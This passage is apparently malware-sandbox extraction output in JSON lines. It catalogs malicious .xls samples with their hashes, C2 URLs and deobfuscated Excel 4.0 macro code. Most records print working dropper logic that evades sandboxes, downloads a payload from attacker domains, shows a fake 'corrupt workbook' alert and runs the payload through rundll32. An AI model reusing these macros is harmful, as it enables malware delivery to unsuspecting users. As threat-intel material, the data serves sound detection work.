,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hpi5f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"xS27h1YWRz\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4b7382556a0972c8928f67afe94d7d3303cd8b08395a0057d5c6b1b4114e6fb3"},"analysis":{"reported":"2020-04-09T16:16:11Z","score":10},"files":[{"filename":"4b7382556a0972c8928f67afe94d7d3303cd8b08395a0057d5c6b1b4114e6fb3","filesize":171008,"md5":"7933c39cd4f7bb4ad54f5ddca6366a19","sha1":"54fbff3934189ce920fab8dc64ea684fe4db205b","sha256":"4b7382556a0972c8928f67afe94d7d3303cd8b08395a0057d5c6b1b4114e6fb3","sha512":"da10b922bdc208fe6600f6cc06bf5bf2907a5acf5096bf0d2f6e2166136b683aa4c512e18071986c68e142ea39cff5ca57a7d936551d65059209bc525938cb98","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4b7382556a0972c8928f67afe94d7d3303cd8b08395a0057d5c6b1b4114e6fb3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ethelenecrace.xyz/fbb3"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ethelenecrace.xyz/fbb3\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"VWObwvgH3E\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4b7b67ff93795604f1978025172effac524ae49b74e3057a69f1752bd34bcc6b"},"analysis":{"reported":"2020-04-09T16:16:11Z","score":10},"files":[{"filename":"4b7b67ff93795604f1978025172effac524ae49b74e3057a69f1752bd34bcc6b","filesize":226304,"md5":"b7c52a471ff4a93e62053fc60c9da3c5","sha1":"cb2354ee1527297d6ff63296145422a10821ce83","sha256":"4b7b67ff93795604f1978025172effac524ae49b74e3057a69f1752bd34bcc6b","sha512":"febaea90eb5013cf86a9c3c2e231e2b74427963422170ba78ae5a6c6178eaf5786d26d70858779f9b876e89a5e7bbeb70c722a1fbde584cea3eff4a8a39096b8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4b7b67ff93795604f1978025172effac524ae49b74e3057a69f1752bd34bcc6b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ddfspwxrb.club/fb2g424g"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"wIdECVWuPL\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4b7e683191c8954e93f7b326e32cea843c42d10501fbbbceb4713afef44d2fd7"},"analysis":{"reported":"2020-04-09T16:16:11Z","score":10},"files":[{"filename":"4b7e683191c8954e93f7b326e32cea843c42d10501fbbbceb4713afef44d2fd7","filesize":141312,"md5":"65927c289304a39037febdd95d681f07","sha1":"eacb25a2f393986fc8e0f09e072daadddf914dc6","sha256":"4b7e683191c8954e93f7b326e32cea843c42d10501fbbbceb4713afef44d2fd7","sha512":"8452ac3ed0dfbb315ef88322aede6ed0e63ffb5b43f5b68ac9526fd03bfc72d6bc0de89130400d85e6d44c95d49f289a64692fca6092a770c9973b9417e48bb9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4b7e683191c8954e93f7b326e32cea843c42d10501fbbbceb4713afef44d2fd7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/ckjbvkf732"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"R0AJ1w3L4A\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4b89404318f20d96d8ffaa0a67d6915fd395777ccdc11617e90acbb8fa586475"},"analysis":{"reported":"2020-04-09T16:16:11Z","score":10},"files":[{"filename":"4b89404318f20d96d8ffaa0a67d6915fd395777ccdc11617e90acbb8fa586475","filesize":206336,"md5":"08c412606e3f5187fe0116f25ef65bc2","sha1":"c2d7de5fb2b4b8d2d7ae899da5bbb53269946025","sha256":"4b89404318f20d96d8ffaa0a67d6915fd395777ccdc11617e90acbb8fa586475","sha512":"4dbe75e94c295cd03540241c017ca1c064e7e06db9cbe9ce750852f58fb305223b2da520224f364d5281d42796d7f0344bbe968bca30adb24c4ebd9604f0d1c1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4b89404318f20d96d8ffaa0a67d6915fd395777ccdc11617e90acbb8fa586475.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"emvYIaYfCk\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4b9b537f540ac1dda2e407593d1b0ccdf7302b839648b4bdd8d43bedbdc8482b"},"analysis":{"reported":"2020-04-09T16:16:11Z","score":10},"files":[{"filename":"4b9b537f540ac1dda2e407593d1b0ccdf7302b839648b4bdd8d43bedbdc8482b","filesize":185344,"md5":"f9c2468ef6e332c73538ade4ae6d43c9","sha1":"002ce15d3dc81cd00691f03cbeb09f9da12e054f","sha256":"4b9b537f540ac1dda2e407593d1b0ccdf7302b839648b4bdd8d43bedbdc8482b","sha512":"d6b7a9fe5d062a40073dc925b825d1b752721a484ed69f20e11c8dbe3ccb43c7e1f43a1160182da5d538d3b159aa9ea66ab73317e00107804a27d0e8bc9fd233","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4b9b537f540ac1dda2e407593d1b0ccdf7302b839648b4bdd8d43bedbdc8482b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4bab4adfb1e25538200ba881d914aa284e368560b1f83365450ae81ca27588ae"},"analysis":{"reported":"2020-04-09T16:16:11Z","score":10},"files":[{"filename":"4bab4adfb1e25538200ba881d914aa284e368560b1f83365450ae81ca27588ae","filesize":104448,"md5":"80760f3648125cc1c469d6b5e4c6c7a8","sha1":"6b200b6147a7c9d4a71237266c8092c58dce89bb","sha256":"4bab4adfb1e25538200ba881d914aa284e368560b1f83365450ae81ca27588ae","sha512":"46d99a1e9492dd1609d1bfe32bbb872e064c726a8d9759a1ece961059365382d9b810149d876ee575a0294f9e64c56347811d995e81a9c33340573a8e0ddee86","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4bab4adfb1e25538200ba881d914aa284e368560b1f83365450ae81ca27588ae.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"Gnt4Zw383D\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4bb7d0bd961604362569f37538685d7da768de0ba4436cacfce9ab2bb7acbb03"},"analysis":{"reported":"2020-04-09T16:16:11Z","score":10},"files":[{"filename":"4bb7d0bd961604362569f37538685d7da768de0ba4436cacfce9ab2bb7acbb03","filesize":206336,"md5":"3c8fc14e1137fdd12a1ff0986f35c6f2","sha1":"ef883843543a5efc0527103360d64fc41b1b5789","sha256":"4bb7d0bd961604362569f37538685d7da768de0ba4436cacfce9ab2bb7acbb03","sha512":"d41425b74004cdb46711333d1344cad0385ec669aa90861a416b843887c232d6c4cc32fcdd9ad0d67421e1032354107129172068a5faf3e9a97d4a5a3f13b684","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4bb7d0bd961604362569f37538685d7da768de0ba4436cacfce9ab2bb7acbb03.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"JPwfv9iLpD\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4bcc6041127400d7244a5cd3779bade307821347672cf6abb771ad4cd6f624df"},"analysis":{"reported":"2020-04-09T16:16:11Z","score":10},"files":[{"filename":"4bcc6041127400d7244a5cd3779bade307821347672cf6abb771ad4cd6f624df","filesize":168960,"md5":"36f2e9e652ee7e4415537a1d5a90c1f7","sha1":"cf9aa5835adbb514ff964b16fd2c3e92ceafe7d9","sha256":"4bcc6041127400d7244a5cd3779bade307821347672cf6abb771ad4cd6f624df","sha512":"46ca04493a9c26c77613059c137e28c482ebbe60c2bbf94b3eae8625bc2e085dbcd7b07a59bc77ca0c4f0dd675ebfd1c617b919f7d0edf9e353f85f9334d7ca2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4bcc6041127400d7244a5cd3779bade307821347672cf6abb771ad4cd6f624df.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"IekDOqTd7J\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4bd262f9a1877ea8865dbdd1c8f76f1556b4ff2ca5bb8fc1f7c201b8d46c9702"},"analysis":{"reported":"2020-04-09T16:16:11Z","score":10},"files":[{"filename":"4bd262f9a1877ea8865dbdd1c8f76f1556b4ff2ca5bb8fc1f7c201b8d46c9702","filesize":171008,"md5":"66e5f0d64f640751b0bc82ca2fe186cb","sha1":"4f9a1931db82c6fab22ae19c01730c8831c0ade7","sha256":"4bd262f9a1877ea8865dbdd1c8f76f1556b4ff2ca5bb8fc1f7c201b8d46c9702","sha512":"3fc18f9bfb1503bca99163306432d9483a7f68a3ccf17e45daffb74a4b045a6fe8e62198952eb747123e9c2c8b69e230df29fef4ef4ce9cbeb0128a3dfc4be62","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4bd262f9a1877ea8865dbdd1c8f76f1556b4ff2ca5bb8fc1f7c201b8d46c9702.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ethelenecrace.xyz/fbb3"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ethelenecrace.xyz/fbb3\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Ot6BwK4FKN\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4bdd86e218f3e64e4c2b82c2039b2f3859a378f4ba5eacffddbb5a012d6e787d"},"analysis":{"reported":"2020-04-09T16:16:11Z","score":10},"files":[{"filename":"4bdd86e218f3e64e4c2b82c2039b2f3859a378f4ba5eacffddbb5a012d6e787d","filesize":168960,"md5":"0dcae8c2d059b11aa72826fa222aa3f5","sha1":"f15087bab5847a5e96a8a870db58a5723f8d4c4d","sha256":"4bdd86e218f3e64e4c2b82c2039b2f3859a378f4ba5eacffddbb5a012d6e787d","sha512":"d55c56da33efc6b4959a5dd078d2167cb65af600663614997fbb73fc63b359c461d402a57982d462b6d3efb9fcda55eb2f15e39ea57c10f5c0d2ec77afd12b23","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4bdd86e218f3e64e4c2b82c2039b2f3859a378f4ba5eacffddbb5a012d6e787d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"1hT1YUWNmX\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4bfc4935c7f3ed1f1f72b7bc478d4a39f2f737a594ed6c3d686dde8319250962"},"analysis":{"reported":"2020-04-09T16:16:11Z","score":10},"files":[{"filename":"4bfc4935c7f3ed1f1f72b7bc478d4a39f2f737a594ed6c3d686dde8319250962","filesize":167936,"md5":"b064f027ba108705ece0bc842c9d1e81","sha1":"8993cb7592e6f09ea441fcd0a0d6ecae1196f843","sha256":"4bfc4935c7f3ed1f1f72b7bc478d4a39f2f737a594ed6c3d686dde8319250962","sha512":"81468a5da58efd4704e87ef0267ce39e90e9a91c49f68c0e79f6ba84ac0edb38cec76e2c1cf7ffa75f73b2dfdf02bebb8a79ad3d7efe6c77e41fd80609bd60f3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4bfc4935c7f3ed1f1f72b7bc478d4a39f2f737a594ed6c3d686dde8319250962.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"8WrraYgiCR\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4c1ce27a8683723b870c9a012675541fe32082dfb07b8933bfdae66a70170a9c"},"analysis":{"reported":"2020-04-09T16:16:12Z","score":10},"files":[{"filename":"4c1ce27a8683723b870c9a012675541fe32082dfb07b8933bfdae66a70170a9c","filesize":168960,"md5":"a82f6b0b86e9c866b7f38f2b406282b2","sha1":"9dded66fa01ce9093def360a2d74abe06ae79e44","sha256":"4c1ce27a8683723b870c9a012675541fe32082dfb07b8933bfdae66a70170a9c","sha512":"7c6c766f0d0fce402533bcabaa981568b5e1f73853be8469bb095edfbdb06e89480322f3a7e43d84ef39fdbc51e4869d99b3c8a35d54e6a7d90082b02486d190","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4c1ce27a8683723b870c9a012675541fe32082dfb07b8933bfdae66a70170a9c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"AKBX3hOMsV\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4c283d0e0d55bdce8c1e4aae1a9ed1875bad4b1f1908577fed40b9f5f54e423d"},"analysis":{"reported":"2020-04-09T16:16:12Z","score":10},"files":[{"filename":"4c283d0e0d55bdce8c1e4aae1a9ed1875bad4b1f1908577fed40b9f5f54e423d","filesize":145920,"md5":"cb4b07cd865c420edb9cd38de2144df0","sha1":"e3b2f59cad06d19782318d8b6b90742434f88508","sha256":"4c283d0e0d55bdce8c1e4aae1a9ed1875bad4b1f1908577fed40b9f5f54e423d","sha512":"f9610958fa2ca60ed7799b78cd0cf8e2ca7a7778e81d6b0b07292c16f5e4027cbe411b90bb5ea123d30104a2c9dbb42609c43ab03bf291cfe085af68891f7bc7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4c283d0e0d55bdce8c1e4aae1a9ed1875bad4b1f1908577fed40b9f5f54e423d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://uenoeakd.site/grwrg24g2g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"l5ZSif1Ee8\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4c2d210fa0a652703a826850270dc9a3f745828c706f107b877ce4ff103743cf"},"analysis":{"reported":"2020-04-09T16:16:12Z","score":10},"files":[{"filename":"4c2d210fa0a652703a826850270dc9a3f745828c706f107b877ce4ff103743cf","filesize":167936,"md5":"28009e87cefa5188f90af5b18a5e3b79","sha1":"00f3858a5d17374efabb52ab7b9a7056fd68aba8","sha256":"4c2d210fa0a652703a826850270dc9a3f745828c706f107b877ce4ff103743cf","sha512":"77ee6ca277aa658e6c0350ec172f374b77d78c11bc0641ccd4b98f8098363bfdebe9e0b8a0297fae5ec948f9f14d36eccdfae0f4b2360d2ef9bd759bbe2005b1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4c2d210fa0a652703a826850270dc9a3f745828c706f107b877ce4ff103743cf.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"B1e5BNlbJ9\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4c505ffc00ac948297e757a831842769ba7ff79279fb27437554a2a09b16e711"},"analysis":{"reported":"2020-04-09T16:16:12Z","score":10},"files":[{"filename":"4c505ffc00ac948297e757a831842769ba7ff79279fb27437554a2a09b16e711","filesize":152576,"md5":"462e16ab567f0932202502494464bb47","sha1":"dc89a9a6f280ae34ddb4e13bc3576824f3e8e6a4","sha256":"4c505ffc00ac948297e757a831842769ba7ff79279fb27437554a2a09b16e711","sha512":"ee18d25ebab899824077bcbf84254a1fde1449ea89b3f9aa9988a0d26b0d4c530fe1776f84841982d8215ceeecb394d8d449f2cb3f695a40333d517dce2a213c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4c505ffc00ac948297e757a831842769ba7ff79279fb27437554a2a09b16e711.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), 